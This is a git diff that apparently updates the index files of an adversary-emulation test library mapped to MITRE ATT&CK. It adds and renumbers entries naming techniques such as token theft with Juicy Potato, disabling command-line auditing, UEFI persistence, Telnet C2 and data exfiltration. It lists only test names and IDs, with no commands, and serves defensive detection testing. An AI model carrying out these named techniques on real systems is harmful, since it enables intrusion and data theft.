+defense-evasion,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
+defense-evasion,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
+defense-evasion,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
+defense-evasion,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -260,7 +264,10 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -503,6 +510,7 @@ privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Th
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -613,6 +621,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
+execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
@@ -669,6 +678,7 @@ persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A S
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,10,"Scheduled Task (""Ghost Task"") via Registry Key Manipulation",704333ca-cc12-4bcf-9916-101844881f54,command_prompt
 persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
+persistence,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
@@ -731,6 +741,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbrok
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
@@ -800,6 +811,7 @@ command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
+command-and-control,T1071,Application Layer Protocol,1,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,powershell
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
@@ -811,6 +823,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec
 command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
+command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -845,11 +858,14 @@ command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
@@ -901,6 +917,7 @@ credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1008,6 +1025,7 @@ credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow C
 credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
 credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
 credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
 credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
@@ -1086,6 +1104,7 @@ discovery,T1135,Network Share Discovery,9,WinPwn - shareenumeration,987901d1-5b8
 discovery,T1135,Network Share Discovery,10,Network Share Discovery via dir command,13daa2cf-195a-43df-a8bd-7dd5ffb607b5,command_prompt
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
+discovery,T1120,Peripheral Device Discovery,3,Peripheral Device Discovery via fsutil,424e18fd-48b8-4201-8d3a-bf591523a686,command_prompt
 discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
 discovery,T1082,System Information Discovery,7,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
 discovery,T1082,System Information Discovery,9,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
@@ -1134,6 +1153,7 @@ discovery,T1049,System Network Connections Discovery,1,System Network Connection
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
 discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell
+discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
@@ -1237,6 +1257,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index ea1b9903..9719e48e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -18,6 +18,7 @@
   - Atomic Test #11: Rundll32 with Ordinal Value [windows]
   - Atomic Test #12: Rundll32 with Control_RunDLL [windows]
   - Atomic Test #13: Rundll32 with desk.cpl [windows]
+  - Atomic Test #14: Running DLL with .init extension and function [windows]
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
   - Atomic Test #1: Malicious PAM rule [linux]
@@ -86,7 +87,8 @@
   - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
   - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
+  - Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
   - Atomic Test #1: Service Registry Permissions Weakness [windows]
   - Atomic Test #2: Service ImagePath Change with reg.exe [windows]
@@ -300,6 +302,7 @@
   - Atomic Test #20: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
   - Atomic Test #21: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
+  - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -313,71 +316,72 @@
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
   - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
   - Atomic Test #3: Modify registry to store logon credentials [windows]
-  - Atomic Test #4: Add domain to Trusted sites Zone [windows]
-  - Atomic Test #5: Javascript in registry [windows]
-  - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
-  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
-  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
-  - Atomic Test #9: Disable Windows Registry Tool [windows]
-  - Atomic Test #10: Disable Windows CMD application [windows]
-  - Atomic Test #11: Disable Windows Task Manager application [windows]
-  - Atomic Test #12: Disable Windows Notification Center [windows]
-  - Atomic Test #13: Disable Windows Shutdown Button [windows]
-  - Atomic Test #14: Disable Windows LogOff Button [windows]
-  - Atomic Test #15: Disable Windows Change Password Feature [windows]
-  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
-  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
-  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
-  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
-  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
-  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
-  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
-  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
-  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
-  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
-  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
-  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
-  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
-  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
-  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
-  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
-  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
-  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
-  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
-  - Atomic Test #35: Disable Windows Toast Notifications [windows]
-  - Atomic Test #36: Disable Windows Security Center Notifications [windows]
-  - Atomic Test #37: Suppress Win Defender Notifications [windows]
-  - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
-  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
-  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
-  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
-  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
-  - Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
-  - Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
-  - Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
-  - Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
-  - Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
-  - Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
-  - Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
-  - Atomic Test #50: Disable Win Defender Notification [windows]
-  - Atomic Test #51: Disable Windows OS Auto Update [windows]
-  - Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
-  - Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
-  - Atomic Test #54: Do Not Connect To Win Update [windows]
-  - Atomic Test #55: Tamper Win Defender Protection [windows]
-  - Atomic Test #56: Snake Malware Registry Blob [windows]
-  - Atomic Test #57: Allow Simultaneous Download Registry [windows]
-  - Atomic Test #58: Modify Internet Zone Protocol Defaults in Current User Registry - cmd [windows]
-  - Atomic Test #59: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell [windows]
-  - Atomic Test #60: Activities To Disable Secondary Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #61: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value. [windows]
-  - Atomic Test #62: Scarab Ransomware Defense Evasion Activities [windows]
-  - Atomic Test #63: Disable Remote Desktop Anti-Alias Setting Through Registry [windows]
-  - Atomic Test #64: Disable Remote Desktop Security Settings Through Registry [windows]
-  - Atomic Test #65: Disabling ShowUI Settings of Windows Error Reporting (WER) [windows]
-  - Atomic Test #66: Enable Proxy Settings [windows]
-  - Atomic Test #67: Set-Up Proxy Server [windows]
-  - Atomic Test #68: RDP Authentication Level Override [windows]
+  - Atomic Test #4: Use Powershell to Modify registry to store logon credentials [windows]
+  - Atomic Test #5: Add domain to Trusted sites Zone [windows]
+  - Atomic Test #6: Javascript in registry [windows]
+  - Atomic Test #7: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #9: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #10: Disable Windows Registry Tool [windows]
+  - Atomic Test #11: Disable Windows CMD application [windows]
+  - Atomic Test #12: Disable Windows Task Manager application [windows]
+  - Atomic Test #13: Disable Windows Notification Center [windows]
+  - Atomic Test #14: Disable Windows Shutdown Button [windows]
+  - Atomic Test #15: Disable Windows LogOff Button [windows]
+  - Atomic Test #16: Disable Windows Change Password Feature [windows]
+  - Atomic Test #17: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #18: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #26: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #27: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #31: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #32: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #33: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #35: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
+  - Atomic Test #36: Disable Windows Toast Notifications [windows]
+  - Atomic Test #37: Disable Windows Security Center Notifications [windows]
+  - Atomic Test #38: Suppress Win Defender Notifications [windows]
+  - Atomic Test #39: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #40: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #41: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #42: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #43: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #44: DisallowRun Execution Of Certain Applications [windows]
+  - Atomic Test #45: Enabling Restricted Admin Mode via Command_Prompt [windows]
+  - Atomic Test #46: Mimic Ransomware - Enable Multiple User Sessions [windows]
+  - Atomic Test #47: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
+  - Atomic Test #48: Event Viewer Registry Modification - Redirection URL [windows]
+  - Atomic Test #49: Event Viewer Registry Modification - Redirection Program [windows]
+  - Atomic Test #50: Enabling Remote Desktop Protocol via Remote Registry [windows]
+  - Atomic Test #51: Disable Win Defender Notification [windows]
+  - Atomic Test #52: Disable Windows OS Auto Update [windows]
+  - Atomic Test #53: Disable Windows Auto Reboot for current logon user [windows]
+  - Atomic Test #54: Windows Auto Update Option to Notify before download [windows]
+  - Atomic Test #55: Do Not Connect To Win Update [windows]
+  - Atomic Test #56: Tamper Win Defender Protection [windows]
+  - Atomic Test #57: Snake Malware Registry Blob [windows]
+  - Atomic Test #58: Allow Simultaneous Download Registry [windows]
